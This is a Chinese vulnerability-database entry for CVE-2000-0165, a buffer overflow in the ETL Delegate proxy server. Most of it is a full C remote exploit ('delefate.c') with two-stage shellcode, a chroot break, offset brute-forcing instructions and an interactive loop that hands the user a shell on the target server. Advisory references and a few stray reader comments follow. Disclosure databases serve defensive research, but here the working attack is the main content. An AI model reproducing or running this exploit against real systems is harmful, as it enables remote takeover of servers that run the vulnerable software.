ETL Delegate缓冲区溢出漏洞
漏洞ID | 1105610 | 漏洞类型 | 未知 |
发布时间 | 1999-11-13 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0165 |
CNNVD-ID | CNNVD-199911-048 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Delegate是ElectroTechnicalLaboratory发布的代理服务器程序。Delegate存在许多没有进行缓冲区边界检查的漏洞,远程攻击者可以利用缓冲区溢出攻击在服务器上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/808/info
The Delegate proxy server from ElectroTechnical Laboratory has numerous (several hundred, according to the orignal poster) unchecked buffers that could be exploited to remotely compromise the server.
/* delefate.c
* delegate 5.9.x - 6.0.x remote exploit
*
* public
*
* will open a shell with the privileges of the nobody user.
*
* 1999/13/11 by scut of teso [http://teso.scene.at/]
*
* word to whole team teso, ADM, w00w00, beavuh and stealth :).
* special thanks to xdr for donating a bit of his elite debugging skillz.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
#define XP_OFFSET 0xbfffe074 /* offset */
unsigned long int xp_off = XP_OFFSET;
/* you don't have to modify this :) i hope :)
*/
#define XP_NETWORK_FD 12
#define XP_NETWORK_OFFSET 0x00000101 /* fixed relative network socket offset */
#define XP_SHELLCODE_OFFSET 0x00000104 /* fixed relative retaddr offset */
#define XP_DIFF 0x0000000e /* 14 bytes after XP_OFFSET starts the shellcode */
#define XP_SH2_FD1 0x00000011
#define XP_SH2_FD2 0x0000001d
#define XP_SH2_FD3 0x0000002a
#define GREEN "E[32m"
#define BOLD "E[1m"
#define NORMAL "E[m"
#define RED "E[31m"
/* local functions
*/
void usage (void);
void shell (int socket);
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
/* because the buffer is rather small (256 bytes), we use a minimalistic
* read() shellcode to increase the chances to hit a correct offet
*/
unsigned char shellcode1[] =
"x77x68x6fx69x73x3ax2fx2fx61x20x62x20x31x20x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90"
/* 30 byte read() shellcode by scut */
"x33xd2x33xc0xebx03x59xebx05xe8xf8xffxffxffx80xc2"
"x10x03xcaxc1xc2x04xb0x03x33xdbxb3x0cxcdx80"
/* ^^ network fd */
"x82xe0xffxbf" /* return address */
"x0dx0a";
/* uid+chroot-break+shell shellcode by lamerz, thanks !
* slightly modified by scut to take care of the network socket
*/
unsigned char shellcode2[]=
"x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdbx89xd9"
"xb3x0cxb0x3fxcdx80x31xc0x31xdbx89xd9xb3x0cx41xb0"
"x3fxcdx80x31xc0x31xdbx89xd9xb3x0cx41x41xb0x3fxcd"
"x80x31xc0x31xdbx43x89xd9x41xb0x3fxcdx80xebx6bx5e"
"x31xc0x31xc9x8dx5ex01x88x46x04x66xb9xffx01xb0x27"
"xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31xdbx8d"
"x5ex08x89x43x02x31xc9xfexc9x31xc0x8dx5ex08xb0x0c"
"xcdx80xfexc9x75xf3x31xc0x88x46x09x8dx5ex08xb0x3d"
"xcdx80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46x07"
"x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56x0cxb0x0b"
"xcdx80x31xc0x31xdbxb0x01xcdx80xe8x90xffxffxffx30"
"x62x69x6ex30x73x68x31x2ex2ex31x31x76x6ex67";
void
usage (void)
{
printf (GREEN BOLD "delefate - delegate 5.9.x, 6.0.x remote" NORMAL "n"
"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "nn"
"usage.... : ./delefate <host> <port> [offset-add]n"
"example.. : ./delefate localhost 8080 -100nn"
"for brute forcing, try from -2000 to 500 in steps of 200nn");
exit (EXIT_FAILURE);
}
int
main (int argc, char **argv)
{
int socket;
char *server;
struct sockaddr_in sa;
unsigned short int port_dest;
unsigned char *retaddr_ptr;
unsigned long int offset;
unsigned char *stack = NULL;
if (argc < 3)
usage ();
printf (GREEN BOLD "delefate 5.9.x - 6.0.x remote exploit" NORMAL "n"
"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "nn");
if (argc == 4) {
long int xp_add = 0;
if (sscanf (argv[3], "%ld", &xp_add) != 1) {
usage ();
}
xp_off += xp_add;
}
printf (" " GREEN "-" NORMAL " using offset 0x%08xn", xp_off);
server = argv[1];
port_dest = atoi (argv[2]);
/* do the offset
*/
retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET;
offset = xp_off + XP_DIFF;
*retaddr_ptr = (offset & 0x000000ff) >> 0;
*(retaddr_ptr + 1) = (offset & 0x0000ff00) >> 8;
*(retaddr_ptr + 2) = (offset & 0x00ff0000) >> 16;
*(retaddr_ptr + 3) = (offset & 0xff000000) >> 24;
*(shellcode1 + XP_NETWORK_OFFSET) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD1) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD2) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD3) = (unsigned char) XP_NETWORK_FD;
printf (" " GREEN "-" NORMAL " connecting to " GREEN "%s:%hu" NORMAL "...", server, port_dest);
fflush (stdout);
socket = net_connect (&sa, server, port_dest, 45);
if (socket <= 0) {
printf (" " RED BOLD "failed" NORMAL ".n");
perror ("net_connect");
exit (EXIT_FAILURE);
}
printf (" " GREEN BOLD "connected." NORMAL "n");
/* send minimalistic read() shellcode */
printf (" " GREEN "-" NORMAL " sending first shellcode...n");
write (socket, shellcode1, strlen (shellcode1));
sleep (1);
/* now send the real shellcode :-) */
printf (" " GREEN "-" NORMAL " sending second shellcode...n");
write (socket, shellcode2, strlen (shellcode2));
printf (" " GREEN "-" NORMAL " spawning shell...nn");
shell (socket);
close (socket);
exit (EXIT_SUCCESS);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
/* original version by typo, modified by scut
*/
void
shell (int socket)
{
char io_buf[1024];
int n;
fd_set fds;
while (1) {
FD_SET (0, &fds);
FD_SET (socket, &fds);
select (socket + 1, &fds, NULL, NULL, NULL);
if (FD_ISSET (0, &fds)) {
n = read (0, io_buf, sizeof (io_buf));
if (n <= 0)
return;
write (socket, io_buf, n);
}
if (FD_ISSET (socket, &fds)) {
n = read (socket, io_buf, sizeof (io_buf));
if (n <= 0)
return;
write (1, io_buf, n);
}
}
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
|参考资料
来源:FREEBSD
名称:FreeBSD-SA-00:04
链接:http://www.securityfocus.com/templates/archive.pike?list=1&date;=2000-02-15&msg;[email protected]
来源:CIAC
名称:K-023
链接:http://www.ciac.org/ciac/bulletins/k-023.shtml
来源:NSFOCUS
名称:100
链接:http://www.nsfocus.net/vulndb/100
相关推荐: HP Web Jetadmin Printer Firmware Update Script Arbitrary File Upload Weakness
HP Web Jetadmin Printer Firmware Update Script Arbitrary File Upload Weakness 漏洞ID 1098671 漏洞类型 Design Error 发布时间 2004-03-24 更新时间 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666